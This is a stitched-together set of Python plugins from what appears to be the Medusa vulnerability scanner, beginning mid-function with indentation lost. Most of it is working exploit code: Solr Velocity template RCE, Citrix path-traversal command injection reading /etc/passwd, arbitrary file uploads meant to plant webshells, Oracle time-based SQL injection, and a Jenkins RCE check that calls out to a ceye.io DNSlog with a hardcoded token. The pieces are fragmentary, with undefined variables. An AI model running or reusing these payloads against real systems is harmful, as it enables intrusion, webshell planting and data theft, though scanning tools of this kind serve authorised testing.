resp = requests.post(payload_url,
headers=headers,
timeout=6,
verify=False)
dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=dns&filter='
time.sleep(5)
resp2 = requests.get(dnslog, timeout=5, verify=False)
con = resp.text
con2 = resp2.text
if con.find(ran) != -1:
Medusa = "{}Jenkins远程命令执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format(
url, payload_url, con, con2)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (str(_t.info))
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
payload_url1 = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,
data=payload_data,
headers=headers1,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
cod2 = resp2.status_code
if con2.find("uid=") != -1 and con2.find(
"groups=") != -1 and con2.find(
"gid=") != -1 and cod2 == 200:
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nPayload:\r\n{}回显内容:{}\r\n\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload1 = "/base/post.php"
payload_url1 = url + payload1
dada = "act=appcode"
payload2 = "/base/appfile.php"
payload_url2 = url + payload2
ran = ClassCongregation.randoms().result(10)
payload_url3 = url + "/effect/source/bg/{}.txt".format(ran)
Headers1 = Headers
Headers2 = Headers
Headers1['Accept'] = '*/*'
Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
Headers2['Accept'] = '*/*'
Headers2[
'Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE'
resp = requests.post(payload_url1,
data=dada,
proxies=proxies,
headers=Headers1,
timeout=5,
verify=False)
con = resp.text
k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值
md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"
1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"
upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"
10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"
getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
resp2 = requests.post(payload_url2,
data=dada2,
proxies=proxies,
headers=Headers2,
timeout=5,
verify=False)
resp3 = requests.get(payload_url3,
headers=Headers1,
proxies=proxies,
timeout=5,
verify=False)
code3 = resp3.status_code
con3 = resp3.text
if code3 == 200 and con3.find(ran) != -1:
Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
url, payload_url2, dada2, payload_url3, con3)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp3, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/library/editornew/Editor/img_save.asp"
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert
testvul
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"
提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"
baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"
45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.post(payload_url,
data=data,
headers=headers,
timeout=6,
verify=False)
con = resp.text
match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
if match:
payload_url2 = scheme + "://" + url + ":" + str(
port) + "/library/editornew/Editor/NewImage/" + match.group(1)
resp2 = s.get(payload_url2,
headers=headers,
timeout=6,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
#如果要上传shell直接把testvul这个值改为一句话就可以
if code2 == 200 and con2.lower().find("testvul") != -1:
Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload = "/vpn/../vpns/portal/scripts/newbm.pl"
payload_url = scheme + "://" + url + ":" + str(port) + payload
randoms = rand()
try:
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
"Connection": "close",
"NSC_USER":
"******".format(randoms),
"NSC_NONCE": "nsroot"
}
data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format(
randoms)
resp = requests.post(payload_url,
data=data,
headers=headers,
timeout=5,
verify=False,
allow_redirects=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("parent.window.ns_reload") != -1:
payload_url2 = scheme + "://" + url + ":" + str(
port) + '/vpn/../vpns/portal/{}.xml'.format(randoms)
headers2 = {
"NSC_USER": "******",
"NSC_NONCE": "nsroot",
"Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0",
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
}
resp2 = requests.get(payload_url2,
headers=headers2,
timeout=5,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
if code2 == 200 and con2.find("root:") != -1 and con2.find(
"bin:") != -1 and con2.find("/root") != -1:
Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format(
url, payload_url2, data, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
# if __name__ == '__main__':
#
# with open(r'../123.txt', 'r') as file:
# content_lists = file.readlines()
# url = [x.strip() for x in content_lists]
# for l in url:
# medusa(l)
#medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
urls = [
'/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1',
'/Price/AVL/AVLPriceTrends_SQU.aspx?classId=1',
'/Price/SuggestList.aspx?priceid=1',
'/PriceDetail/PriceComposition_Formula.aspx?indexNum=3&elementId=1',
'/Products/Category/CategoryOption.aspx?option=IsStop&classId=1',
'/Products/Tiens/CategoryStockView.aspx?id=1',
'/custom/CompanyCGList.aspx?ComId=1',
'/SuperMarket/InterestInfoDetail.aspx?ItemId=1',
'/Orders/k3orderdetail.aspx?FINTERID=1',
'/custom/GroupNewsList.aspx?child=true&groupId=121'
]
payload1 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,0)"
payload2 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,5)"
for payload in urls:
try:
payload_url = scheme + "://" + url + ":" + str(
port) + payload + payload1
payload_url2 = scheme + "://" + url + ":" + str(
port) + payload + payload2
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
time0 = time.time()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
time1 = time.time()
resp2 = s.get(payload_url2,
headers=headers,
timeout=6,
verify=False)
time2 = time.time()
con = resp.text
code = resp.status_code
code2 = resp2.status_code
if code2 != 0 and code != 0 and ((time1 - time0) -
(time2 - time1)) > 4:
Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(
url, con, payload_url)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
Medusas=[]
Medusa = "{} 存在敏感文件压缩下载漏洞\r\n漏洞详情:\r\nPayload:".format(url)
Medusas.append(str(Medusa))
#构建特殊Payload并发送到SpecialPayload中
colon_payload = ""
unsigned_payload = ""
point_payload = ""
underline_payload = ""
expansion_number_payload = ""
url_str_list = url.split(".")
for url_str in url_str_list:
colon_payload = colon_payload + url_str + ":"
for url_str in url_str_list:
unsigned_payload = unsigned_payload + url_str
for url_str in url_str_list:
point_payload = point_payload + url_str + "."
for url_str in url_str_list:
underline_payload = underline_payload + url_str + "_"
for url_str in url_str_list:
expansion_number_payload = expansion_number_payload + url_str + "-"
payloads.append(str("/"+colon_payload[:-1]))
payloads.append(str("/"+unsigned_payload))
payloads.append(str("/"+point_payload[:-1]))
payloads.append(str("/"+underline_payload[:-1]))
payloads.append(str("/"+expansion_number_payload[:-1]))
for payload in payloads:
for suffix in suffixs:
try:
payload_url = scheme+"://"+url+payload+suffix
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
#s = requests.session()
if ProxyIp!=None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
elif ProxyIp==None:
resp = requests.head(payload_url,headers=headers, timeout=5, verify=False)
resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False)
con = resp.text
code = resp.status_code
if code==200 and (resp2.headers["Content-Type"] == "application/zip" or resp2.headers["Content-Type"] == "application/x-rar-compressed" or resp2.headers["Content-Type"] == "application/x-gzip" or resp2.headers["Content-Type"] == "application/gzip") :
Medusa="{}\r\n".format(payload_url)
Medusas.append(str(Medusa))
except Exception as e:
pass
for Special in SpecialPayload:
try:
payload_url = scheme + "://" + url + Special
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
# s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
elif ProxyIp == None:
resp = requests.head(payload_url, headers=headers, timeout=5, verify=False)
resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and resp2.headers["Content-Type"] == "text/plain":
Medusa = "{}\r\n".format(payload_url)
Medusas.append(str(Medusa))
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (_t.info)
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
try:
for i in Medusas:
Medusa=Medusa+i
return Medusas
except:
pass
